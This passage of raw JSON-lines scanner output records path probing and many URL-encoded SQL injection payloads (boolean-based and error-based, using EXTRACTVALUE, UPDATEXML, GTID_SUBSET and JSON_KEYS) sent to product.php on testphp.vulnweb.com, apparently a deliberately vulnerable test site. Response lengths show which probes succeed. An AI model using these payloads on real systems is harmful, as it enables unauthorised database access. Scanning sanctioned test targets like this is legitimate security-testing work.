Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/porno/1\",\"time\":\"347.841557ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.003215293Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/porno/1L\",\"input\":\"http://testphp.vulnweb.com/porno/1L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/porno/1L\",\"time\":\"351.070283ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.323435631Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/privacy.php\",\"input\":\"http://testphp.vulnweb.com/privacy.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/privacy.php\",\"time\":\"343.771724ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.370173443Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/prod\",\"input\":\"http://testphp.vulnweb.com/prod\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/prod\",\"time\":\"352.347494ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.370645611Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.p\",\"input\":\"http://testphp.vulnweb.com/product.p\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.p\",\"time\":\"351.906887ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.444113944Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php4\",\"input\":\"http://testphp.vulnweb.com/product.php4\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php4\",\"time\":\"343.93711ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.499865374Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php4H\",\"input\":\"http://testphp.vulnweb.com/product.php4H\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php4H\",\"time\":\"351.321235ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.605868605Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%283016%3D3777%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%203777%20UNION%20SELECT%206655%29%20END%29%29\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%283016%3D3777%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%203777%20UNION%20SELECT%206655%29%20END%29%29\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%283016%3D3777%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%203777%20UNION%20SELECT%206655%29%20END%29%29\",\"time\":\"341.013328ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.640500956Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%286521%3D6521%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%207389%20UNION%20SELECT%204381%29%20END%29%29\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%286521%3D6521%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%207389%20UNION%20SELECT%204381%29%20END%29%29\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=%28SELECT%20%28CASE%20WHEN%20%286521%3D6521%29%20THEN%20%271%27vfGxFO%3C%27%22%3EBZKaXC%27%20ELSE%20%28SELECT%207389%20UNION%20SELECT%204381%29%20END%29%29\",\"time\":\"349.521938ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.710522383Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1\",\"time\":\"354.263771ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":655,\"lines\":117,\"status_code\":200,\"content_length\":6428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.789314976Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%203535%3D6381--%20rDMd\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%203535%3D6381--%20rDMd\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20AND%203535%3D6381--%20rDMd\",\"time\":\"349.190621ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.843854906Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%206956%3D6956--%20bSrQ\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%206956%3D6956--%20bSrQ\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20AND%206956%3D6956--%20bSrQ\",\"time\":\"348.291987ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":655,\"lines\":117,\"status_code\":200,\"content_length\":6428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:37.935328485Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%208068%3D3952--%20HaHk\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%208068%3D3952--%20HaHk\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20AND%208068%3D3952--%20HaHk\",\"time\":\"350.040144ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":490,\"lines\":111,\"status_code\":200,\"content_length\":5056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:38.017780737Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x717a707871%2C%28SELECT%20%28ELT%286368%3D6368%2C1%29%29%29%2C0x71786b7a71%29%29%20USING%20utf8%29%29%29--%20tjJI\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x717a707871%2C%28SELECT%20%28ELT%286368%3D6368%2C1%29%29%29%2C0x71786b7a71%29%29%20USING%20utf8%29%29%29--%20tjJI\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x717a707871%2C%28SELECT%20%28ELT%286368%3D6368%2C1%29%29%29%2C0x71786b7a71%29%29%20USING%20utf8%29%29%29--%20tjJI\",\"time\":\"345.653923ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:41.246842451Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%20ROW%283358%2C5343%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707871%2C%28SELECT%20%28ELT%283358%3D3358%2C1%29%29%29%2C0x71786b7a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203215%20UNION%20SELECT%207273%20UNION%20SELECT%202556%20UNION%20SELECT%206243%29a%20GROUP%20BY%20x%29--%20YjgF\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%20ROW%283358%2C5343%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707871%2C%28SELECT%20%28ELT%283358%3D3358%2C1%29%29%29%2C0x71786b7a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203215%20UNION%20SELECT%207273%20UNION%20SELECT%202556%20UNION%20SELECT%206243%29a%20GROUP%20BY%20x%29--%20YjgF\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20AND%20ROW%283358%2C5343%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x717a707871%2C%28SELECT%20%28ELT%283358%3D3358%2C1%29%29%29%2C0x71786b7a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%203215%20UNION%20SELECT%207273%20UNION%20SELECT%202556%20UNION%20SELECT%206243%29a%20GROUP%20BY%20x%29--%20YjgF\",\"time\":\"348.002401ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:41.384791609Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%20UPDATEXML%282248%2CCONCAT%280x2e%2C0x717a707871%2C%28SELECT%20%28ELT%282248%3D2248%2C1%29%29%29%2C0x71786b7a71%29%2C9386%29--%20gByI\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20AND%20UPDATEXML%282248%2CCONCAT%280x2e%2C0x717a707871%2C%28SELECT%20%28ELT%282248%3D2248%2C1%29%29%29%2C0x71786b7a71%29%2C9386%29--%20gByI\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20AND%20UPDATEXML%282248%2CCONCAT%280x2e%2C0x717a707871%2C%28SELECT%20%28ELT%282248%3D2248%2C1%29%29%29%2C0x71786b7a71%29%2C9386%29--%20gByI\",\"time\":\"350.132613ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:41.479248457Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%2017-\",\"time\":\"349.080706ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:41.526051593Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%2017-7%3d10\",\"time\":\"354.001418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":655,\"lines\":117,\"status_code\":200,\"content_length\":6428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:41.865551942Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10CONFIRMED\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%2017-7%3d10CONFIRMED\",\"time\":\"349.784692ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:42.289836223Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20EXTRACTVALUE%282125%2CCONCAT%280x5c%2C0x717a707871%2C%28SELECT%20%28ELT%282125%3D2125%2C1%29%29%29%2C0x71786b7a71%29%29--%20yDyc\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20EXTRACTVALUE%282125%2CCONCAT%280x5c%2C0x717a707871%2C%28SELECT%20%28ELT%282125%3D2125%2C1%29%29%29%2C0x71786b7a71%29%29--%20yDyc\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%20EXTRACTVALUE%282125%2CCONCAT%280x5c%2C0x717a707871%2C%28SELECT%20%28ELT%282125%3D2125%2C1%29%29%29%2C0x71786b7a71%29%29--%20yDyc\",\"time\":\"346.862708ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:42.320883378Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20GTID_SUBSET%28CONCAT%280x717a707871%2C%28SELECT%20%28ELT%289839%3D9839%2C1%29%29%29%2C0x71786b7a71%29%2C9839%29--%20UHaY\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20GTID_SUBSET%28CONCAT%280x717a707871%2C%28SELECT%20%28ELT%289839%3D9839%2C1%29%29%29%2C0x71786b7a71%29%2C9839%29--%20UHaY\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%20GTID_SUBSET%28CONCAT%280x717a707871%2C%28SELECT%20%28ELT%289839%3D9839%2C1%29%29%29%2C0x71786b7a71%29%2C9839%29--%20UHaY\",\"time\":\"349.8554ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:42.508554032Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x717a707871%2C%28SELECT%20%28ELT%287144%3D7144%2C1%29%29%29%2C0x71786b7a71%29%29%20USING%20utf8%29%29%29--%20UVvB\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x717a707871%2C%28SELECT%20%28ELT%287144%3D7144%2C1%29%29%29%2C0x71786b7a71%29%29%20USING%20utf8%29%29%29--%20UVvB\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x717a707871%2C%28SELECT%20%28ELT%287144%3D7144%2C1%29%29%29%2C0x71786b7a71%29%29%20USING%20utf8%29%29%29--%20UVvB\",\"time\":\"351.458873ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:43.018234511Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20UPDATEXML%282075%2CCONCAT%280x2e%2C0x717a707871%2C%28SELECT%20%28ELT%282075%3D2075%2C1%29%29%29%2C0x71786b7a71%29%2C3373%29--%20otOt\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%20OR%20UPDATEXML%282075%2CCONCAT%280x2e%2C0x717a707871%2C%28SELECT%20%28ELT%282075%3D2075%2C1%29%29%29%2C0x71786b7a71%29%2C3373%29--%20otOt\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%20OR%20UPDATEXML%282075%2CCONCAT%280x2e%2C0x717a707871%2C%28SELECT%20%28ELT%282075%3D2075%2C1%29%29%29%2C0x71786b7a71%29%2C3373%29--%20otOt\",\"time\":\"366.570692ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:43.133012866Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC\",\"time\":\"354.573273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:44.78377376Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%206010%3D6010\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%206010%3D6010\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%206010%3D6010\",\"time\":\"347.415976ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:46.094083545Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%206010%3D6010--%20XMfE\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%206010%3D6010--%20XMfE\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%206010%3D6010--%20XMfE\",\"time\":\"353.912517ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:46.102018677Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%209104%3D9652\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%209104%3D9652\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%20AND%209104%3D9652\",\"time\":\"349.738102ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:46.437105235Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%22%28%28..%27%29.%2C%2C\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%22%28%28..%27%29.%2C%2C\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%22%28%28..%27%29.%2C%2C\",\"time\":\"343.764614ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.31098511Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%20AND%203825%3D3319%20AND%20%27xAot%27%3D%27xAot\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%20AND%203825%3D3319%20AND%20%27xAot%27%3D%27xAot\",\"title\":\"picture details\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%20AND%203825%3D3319%20AND%20%27xAot%27%3D%27xAot\",\"time\":\"349.376813ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":504,\"lines\":113,\"status_code\":200,\"content_length\":5174,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:26:47.325403658Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%29%20AND%206010%3D6010%20AND%20%28%27XKAt%27%3D%27XKAt\",\"input\":\"http://testphp.vulnweb.com/product.php?pic=1%27vfGxFO%3C%27%22%3EBZKaXC%27%29%20AND%206010%3D6010%20AND%20%28%27XKAt%27%3D%27XKAt\",\"title\":\"picture 